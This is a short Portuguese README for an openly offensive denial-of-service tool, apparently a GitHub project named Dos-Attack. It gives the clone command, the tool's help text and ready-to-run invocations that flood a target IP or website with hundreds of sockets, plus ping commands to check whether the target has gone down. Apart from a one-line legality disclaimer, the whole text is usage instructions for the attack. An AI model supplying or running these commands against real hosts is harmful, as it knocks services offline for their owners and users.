- Não ataque sites privados. isto é illegal.
- Ultima versão do
Python3
. para verificar isto, é bem simples. Basta digitar:
python --version
Clone
o repositorio usando:
git clone https://github.com/DioBruh/Dos-Attack/
Navegue
até a pasta do scanner utilizando:
cd tools-hacking
cd dos
Usage:
python dos.py --help
usage: dos.py [-h] [--http [HTTP ...]] [-i [IP]] [-p PORT] [-s SOCKETS]
optional arguments:
-h, --help show this help message and exit
--http [HTTP ...] Attack https://<host>
-i [IP], --ip [IP] Host to attack.
-p PORT, --port PORT Port of webserver, usually 80
-s SOCKETS, --sockets SOCKETS
Number of sockets to use in the test
python dos.py --ip <ip> -p <port> -s 500
ping <ip> -t
ping <ip>
python dos.py --http <web_site> -p <port> -s 500
default port is: 80
default socks is: 150
Existem 2 modos possiveis para os ataques.
- IP attack.
- WebSite attack.
Dio Brando |
KobaWare |